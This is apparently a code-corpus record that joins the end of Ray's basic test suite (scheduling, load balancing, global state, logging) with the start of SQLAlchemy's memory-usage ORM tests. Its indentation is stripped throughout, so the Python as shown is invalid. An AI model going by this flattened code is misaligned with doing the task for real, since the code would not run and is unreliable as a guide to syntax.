ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
        # Each instance of h submits and blocks on the results of other
        # remote tasks using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.tests.utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.tests.utils.wait_for_pid_to_exit(pid1)
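# Helper for the load-balancing tests below: it repeatedly submits
# `total_tasks` copies of `remote_function` and records which plasma store
# each task ran against. An attempt succeeds once all `num_nodes` stores
# appear at least `minimum_count` times each; otherwise it retries, failing
# the assertion after `num_attempts` attempts.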
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner even when the tasks have
# dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the local schedulers. Make sure
# this doesn't prevent tasks from being scheduled on other local
# schedulers.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
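# Polling helpers: the global state tables are filled in asynchronously, so
# these loops wait (up to `timeout` seconds) for the task/object tables to
# reach the expected size before the tests inspect them.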
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.worker.global_worker.current_task_id.hex()
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
nil_id_hex = ray.ObjectID.nil().hex()
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == nil_id_hex
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "ray.tests.test_basic.f"
assert function_table_entry["DriverID"] == driver_id
assert function_table_entry["Module"] == "ray.tests.test_basic"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id]["IsEviction"][0] is False
assert object_table[result_id]["IsEviction"][0] is False
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
# TODO(rkn): Pytest actually has tools for capturing stdout and stderr, so we
# should use those, but they seem to conflict with Ray's use of faulthandler.
class CaptureOutputAndError(object):
"""Capture stdout and stderr of some span.
This can be used as follows.
captured = {}
with CaptureOutputAndError(captured):
# Do stuff.
# Access captured["out"] and captured["err"].
"""
def __init__(self, captured_output_and_error):
if sys.version_info >= (3, 0):
import io
self.output_buffer = io.StringIO()
self.error_buffer = io.StringIO()
else:
import cStringIO
self.output_buffer = cStringIO.StringIO()
self.error_buffer = cStringIO.StringIO()
self.captured_output_and_error = captured_output_and_error
def __enter__(self):
sys.stdout.flush()
sys.stderr.flush()
self.old_stdout = sys.stdout
self.old_stderr = sys.stderr
sys.stdout = self.output_buffer
sys.stderr = self.error_buffer
def __exit__(self, exc_type, exc_value, traceback):
sys.stdout.flush()
sys.stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
self.captured_output_and_error["out"] = self.output_buffer.getvalue()
self.captured_output_and_error["err"] = self.error_buffer.getvalue()
def test_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=True)
@ray.remote
def f():
# It's important to make sure that these print statements occur even
# without calling sys.stdout.flush() and sys.stderr.flush().
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
for i in range(200):
assert str(i) in output_lines
error_lines = captured["err"]
assert len(error_lines) == 0
def test_not_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=False)
@ray.remote
def f():
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
assert len(output_lines) == 0
error_lines = captured["err"]
assert len(error_lines) == 0
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.DriverID(b"00112233445566778899")
ray.init(num_cpus=1, driver_id=dummy_driver_id)
# in driver
assert dummy_driver_id == ray._get_runtime_context().current_driver_id
# in worker
@ray.remote
def f():
return ray._get_runtime_context().current_driver_id
assert dummy_driver_id == ray.get(f.remote())
ray.shutdown()
def test_object_id_properties():
id_bytes = b"00112233445566778899"
object_id = ray.ObjectID(id_bytes)
assert object_id.binary() == id_bytes
object_id = ray.ObjectID.nil()
assert object_id.is_nil()
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(id_bytes + b"1234")
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(b"0123456789")
object_id = ray.ObjectID(_random_string())
assert not object_id.is_nil()
assert object_id.binary() != id_bytes
id_dumps = pickle.dumps(object_id)
id_from_dumps = pickle.loads(id_dumps)
assert id_from_dumps == object_id
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
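# Each result below is ~60MB of uint8 data while the object store only holds
# 10**8 bytes, so producing the second result should evict the first one;
# waiting on the evicted ID afterwards appears intended to exercise
# reconstruction of the lost object.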
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.binary()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle(
) == "ray_worker:ray.tests.test_basic.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.DriverID.nil()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(shutdown_only):
ray.init(num_cpus=2)
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
def test_pandas_parquet_serialization():
# Only test this if pandas is installed
pytest.importorskip("pandas")
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as pq
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "parquet-test")
pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
with open(os.path.join(tempdir, "parquet-compression"), "wb") as f:
table = pa.Table.from_arrays([pa.array([1, 2, 3])], ["hello"])
pq.write_table(table, f, compression="lz4")
# Clean up
shutil.rmtree(tempdir)
def test_socket_dir_not_existing(shutdown_only):
random_name = ray.ObjectID(_random_string()).hex()
temp_raylet_socket_dir = "/tmp/ray/tests/{}".format(random_name)
temp_raylet_socket_name = os.path.join(temp_raylet_socket_dir,
"raylet_socket")
ray.init(num_cpus=1, raylet_socket_name=temp_raylet_socket_name)
def test_raylet_is_robust_to_random_messages(shutdown_only):
ray.init(num_cpus=1)
node_manager_address = None
node_manager_port = None
for client in ray.global_state.client_table():
if "NodeManagerAddress" in client:
node_manager_address = client["NodeManagerAddress"]
node_manager_port = client["NodeManagerPort"]
assert node_manager_address
assert node_manager_port
# Try to bring down the node manager:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((node_manager_address, node_manager_port))
s.send(1000 * b'asdf')
@ray.remote
def f():
return 1
assert ray.get(f.remote()) == 1
def test_non_ascii_comment(ray_start):
@ray.remote
def f():
# 日本語 Japanese comment
return 1
assert ray.get(f.remote()) == 1
@ray.remote
def echo(x):
return x
@ray.remote
class WithConstructor(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class WithoutConstructor(object):
def set_data(self, data):
self.data = data
def get_data(self):
return self.data
class BaseClass(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class DerivedClass(BaseClass):
def __init__(self, data):
# Due to different behaviors of super in Python 2 and Python 3,
# we use BaseClass directly here.
BaseClass.__init__(self, data)
def test_load_code_from_local(shutdown_only):
ray.init(load_code_from_local=True, num_cpus=4)
message = "foo"
# Test normal function.
assert ray.get(echo.remote(message)) == message
# Test actor class with constructor.
actor = WithConstructor.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test actor class without constructor.
actor = WithoutConstructor.remote()
actor.set_data.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test derived actor class.
actor = DerivedClass.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test using ray.remote decorator on raw classes.
base_actor_class = ray.remote(num_cpus=1)(BaseClass)
base_actor = base_actor_class.remote(message)
assert ray.get(base_actor.get_data.remote()) == message
|
test_memusage.py
|
import decimal
import gc
import itertools
import multiprocessing
import weakref
import sqlalchemy as sa
from sqlalchemy import ForeignKey
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import Unicode
from sqlalchemy import util
from sqlalchemy.orm import aliased
from sqlalchemy.orm import clear_mappers
from sqlalchemy.orm import configure_mappers
from sqlalchemy.orm import create_session
from sqlalchemy.orm import join as orm_join
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import Load
from sqlalchemy.orm import mapper
from sqlalchemy.orm import relationship
from sqlalchemy.orm import selectinload
from sqlalchemy.orm import Session
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import subqueryload
from sqlalchemy.orm.mapper import _mapper_registry
from sqlalchemy.orm.session import _sessions
from sqlalchemy.processors import to_decimal_processor_factory
from sqlalchemy.processors import to_unicode_processor_factory
from sqlalchemy.sql import column
from sqlalchemy.sql import util as sql_util
from sqlalchemy.sql.visitors import cloned_traverse
from sqlalchemy.sql.visitors import replacement_traverse
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.testing.util import gc_collect
from ..orm import _fixtures
class A(fixtures.ComparableEntity):
pass
class B(fixtures.ComparableEntity):
pass
class ASub(A):
pass
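# Decorator used by CycleTest below: it calls the wrapped function once as a
# warm-up (so mappers, caches, etc. are configured), garbage-collects, then
# runs it again and asserts that the final gc_collect() reports at most
# `expected` unreachable objects, i.e. the call itself creates no more than
# `expected` reference cycles. (gc_collect is assumed here to return
# gc.collect()'s count of unreachable objects.)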
def assert_cycles(expected=0):
def decorate(fn):
def go():
fn() # warmup, configure mappers, caches, etc.
gc_collect()
gc_collect()
gc_collect() # multiple calls seem to matter
# gc.set_debug(gc.DEBUG_COLLECTABLE)
try:
return fn() # run for real
finally:
unreachable = gc_collect()
assert unreachable <= expected
gc_collect()
return go
return decorate
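# Decorator for the memory-growth tests: it runs the wrapped function in
# batches of five (in a subprocess by default, via run_in_process) and
# samples the number of live objects after each call. The test passes once
# the running maximum stops growing for long enough, and fails with the
# sample history if growth continues until `maxtimes` calls have been made.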
def profile_memory(
maxtimes=250, assert_no_sessions=True, get_num_objects=None
):
def decorate(func):
        # Run the test N times; if the length of gc.get_objects() keeps
        # growing, fail the test.
def get_objects_skipping_sqlite_issue():
# pysqlite keeps adding weakref objects which only
# get reset after 220 iterations. We'd like to keep these
# tests under 50 iterations and ideally about ten, so
# just filter them out so that we get a "flatline" more quickly.
if testing.against("sqlite+pysqlite"):
return [
o
for o in gc.get_objects()
if not isinstance(o, weakref.ref)
]
else:
return gc.get_objects()
def profile(queue, func_args):
# give testing.db a brand new pool and don't
# touch the existing pool, since closing a socket
# in the subprocess can affect the parent
testing.db.pool = testing.db.pool.recreate()
gc_collect()
samples = []
max_ = 0
max_grew_for = 0
success = False
until_maxtimes = 0
try:
while True:
if until_maxtimes >= maxtimes // 5:
break
for x in range(5):
try:
func(*func_args)
except Exception as err:
queue.put(
(
"result",
False,
"Test raised an exception: %r" % err,
)
)
raise
gc_collect()
samples.append(
get_num_objects()
if get_num_objects is not None
else len(get_objects_skipping_sqlite_issue())
)
if assert_no_sessions:
assert len(_sessions) == 0, "%d sessions remain" % (
len(_sessions),
)
# queue.put(('samples', samples))
latest_max = max(samples[-5:])
if latest_max > max_:
queue.put(
(
"status",
"Max grew from %s to %s, max has "
"grown for %s samples"
% (max_, latest_max, max_grew_for),
)
)
max_ = latest_max
max_grew_for += 1
until_maxtimes += 1
continue
else:
queue.put(
(
"status",
"Max remained at %s, %s more attempts left"
% (max_, max_grew_for),
)
)
max_grew_for -= 1
if max_grew_for == 0:
success = True
break
except Exception as err:
queue.put(("result", False, "got exception: %s" % err))
else:
if not success:
queue.put(
(
"result",
False,
"Ran for a total of %d times, memory kept "
"growing: %r" % (maxtimes, samples),
)
)
else:
queue.put(("result", True, "success"))
def run_plain(*func_args):
import queue as _queue
q = _queue.Queue()
profile(q, func_args)
while True:
row = q.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
assert row[1], row[2]
# return run_plain
def run_in_process(*func_args):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=profile, args=(queue, func_args)
)
proc.start()
while True:
row = queue.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
proc.join()
assert row[1], row[2]
return run_in_process
return decorate
def assert_no_mappers():
clear_mappers()
gc_collect()
assert len(_mapper_registry) == 0
class EnsureZeroed(fixtures.ORMTest):
def setup(self):
_sessions.clear()
_mapper_registry.clear()
        # Enable query caching, but make the cache small so that the tests
        # don't take too long. Issues with caching include making sure
        # sessions don't get stuck inside of it. It will also make tests like
        # test_mapper_reset take a long time, because mappers are very much a
        # part of what's in the cache.
self.engine = engines.testing_engine(
options={"use_reaper": False, "query_cache_size": 10}
)
class MemUsageTest(EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
def test_type_compile(self):
from sqlalchemy.dialects.sqlite.base import dialect as SQLiteDialect
cast = sa.cast(column("x"), sa.Integer)
@profile_memory()
def go():
dialect = SQLiteDialect()
cast.compile(dialect=dialect)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_init(self):
@profile_memory()
def go():
to_decimal_processor_factory({}, 10)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_process(self):
@profile_memory()
def go():
to_decimal_processor_factory(decimal.Decimal, 10)(1.2)
go()
@testing.requires.cextensions
def test_UnicodeResultProcessor_init(self):
@profile_memory()
def go():
to_unicode_processor_factory("utf8")
go()
def test_ad_hoc_types(self):
"""test storage of bind processors, result processors
in dialect-wide registry."""
from sqlalchemy.dialects import mysql, postgresql, sqlite
from sqlalchemy import types
eng = engines.testing_engine()
for args in (
(types.Integer,),
(types.String,),
(types.PickleType,),
(types.Enum, "a", "b", "c"),
(sqlite.DATETIME,),
(postgresql.ENUM, "a", "b", "c"),
(types.Interval,),
(postgresql.INTERVAL,),
(mysql.VARCHAR,),
):
@profile_memory()
def go():
type_ = args[0](*args[1:])
bp = type_._cached_bind_processor(eng.dialect)
rp = type_._cached_result_processor(eng.dialect, 0)
bp, rp # strong reference
go()
assert not eng.dialect._type_memos
@testing.fails()
def test_fixture_failure(self):
class Foo(object):
pass
stuff = []
@profile_memory(maxtimes=20)
def go():
stuff.extend(Foo() for i in range(100))
go()
class MemUsageWBackendTest(EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = "cpython", "memory_process_intensive"
__sparse_backend__ = True
# ensure a pure growing test trips the assertion
@testing.fails_if(lambda: True)
def test_fixture(self):
class Foo(object):
pass
x = []
@profile_memory(maxtimes=10)
def go():
x[-1:] = [Foo(), Foo(), Foo(), Foo(), Foo(), Foo()]
go()
def test_session(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all(self.engine)
m1 = mapper(
A,
table1,
properties={
"bs": relationship(
B, cascade="all, delete", order_by=table2.c.col1
)
},
)
m2 = mapper(B, table2)
@profile_memory()
def go():
with Session(self.engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
go()
metadata.drop_all(self.engine)
del m1, m2
assert_no_mappers()
def test_sessionmaker(self):
@profile_memory()
def go():
sessmaker = sessionmaker(bind=self.engine)
sess = sessmaker()
r = sess.execute(select(1))
r.close()
sess.close()
del sess
del sessmaker
go()
@testing.emits_warning("Compiled statement cache for mapper.*")
@testing.emits_warning("Compiled statement cache for lazy loader.*")
@testing.crashes("sqlite", ":memory: connection not suitable here")
def test_orm_many_engines(self):
metadata = MetaData(self.engine)
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all()
m1 = mapper(
A,
table1,
properties={
"bs": relationship(
B, cascade="all, delete", order_by=table2.c.col1
)
},
_compiled_cache_size=50,
)
m2 = mapper(B, table2, _compiled_cache_size=50)
@profile_memory()
def go():
engine = engines.testing_engine(
options={
"logging_name": "FOO",
"pool_logging_name": "BAR",
"use_reaper": False,
}
)
with Session(engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
engine.dispose()
go()
metadata.drop_all()
del m1, m2
assert_no_mappers()
@testing.emits_warning("Compiled statement cache for.*")
def test_many_updates(self):
metadata = MetaData()
wide_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
*[Column("col%d" % i, Integer) for i in range(10)]
)
class Wide(object):
pass
mapper(Wide, wide_table, _compiled_cache_size=10)
metadata.create_all(self.engine)
with Session(self.engine) as session:
w1 = Wide()
session.add(w1)
session.commit()
del session
counter = [1]
@profile_memory()
def go():
with Session(self.engine) as session:
w1 = session.query(Wide).first()
x = counter[0]
dec = 10
while dec > 0:
# trying to count in binary here,
# works enough to trip the test case
if pow(2, dec) < x:
setattr(w1, "col%d" % dec, counter[0])
x -= pow(2, dec)
dec -= 1
session.commit()
counter[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.requires.savepoints
@testing.provide_metadata
def test_savepoints(self):
metadata = self.metadata
some_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
class SomeClass(object):
pass
mapper(SomeClass, some_table)
metadata.create_all()
session = Session(testing.db)
target_strings = (
session.connection().dialect.identifier_preparer._strings
)
session.close()
@profile_memory(
assert_no_sessions=False,
get_num_objects=lambda: len(target_strings),
)
def go():
session = Session(testing.db)
with session.transaction:
sc = SomeClass()
session.add(sc)
with session.begin_nested():
session.query(SomeClass).first()
go()
@testing.crashes("mysql+cymysql", "blocking")
def test_unicode_warnings(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", Unicode(30)),
)
metadata.create_all(self.engine)
i = [1]
        # The iteration count here is cranked way up so that we can see
        # pysqlite clearing out its internal buffer and allow the test to
        # pass.
@testing.emits_warning()
@profile_memory()
def go():
            # Execute with a non-unicode object; a warning is emitted, and
            # that warning shouldn't clog up memory.
with self.engine.connect() as conn:
conn.execute(
table1.select().where(table1.c.col2 == "foo%d" % i[0])
)
i[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
def test_warnings_util(self):
counter = itertools.count()
import warnings
warnings.filterwarnings("ignore", "memusage warning.*")
@profile_memory()
def go():
util.warn_limited(
"memusage warning, param1: %s, param2: %s",
(next(counter), next(counter)),
)
go()
def test_mapper_reset(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
@profile_memory()
def go():
mapper(
A,
table1,
properties={"bs": relationship(B, order_by=table2.c.col1)},
)
mapper(B, table2)
sess = create_session(self.engine)
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.flush()
sess.close()
clear_mappers()
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_alias_pathing(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("bid", Integer, ForeignKey("b.id")),
Column("type", String(30)),
)
asub = Table(
"asub",
metadata,
Column("id", Integer, ForeignKey("a.id"), primary_key=True),
Column("data", String(30)),
)
b = Table(
"b",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
mapper(A, a, polymorphic_identity="a", polymorphic_on=a.c.type)
mapper(ASub, asub, inherits=A, polymorphic_identity="asub")
mapper(B, b, properties={"as_": relationship(A)})
metadata.create_all(self.engine)
sess = Session(self.engine)
a1 = ASub(data="a1")
a2 = ASub(data="a2")
a3 = ASub(data="a3")
b1 = B(as_=[a1, a2, a3])
sess.add(b1)
sess.commit()
del sess
# sqlite has a slow enough growth here
# that we have to run it more times to see the
# "dip" again
@profile_memory(maxtimes=120)
def go():
sess = Session(self.engine)
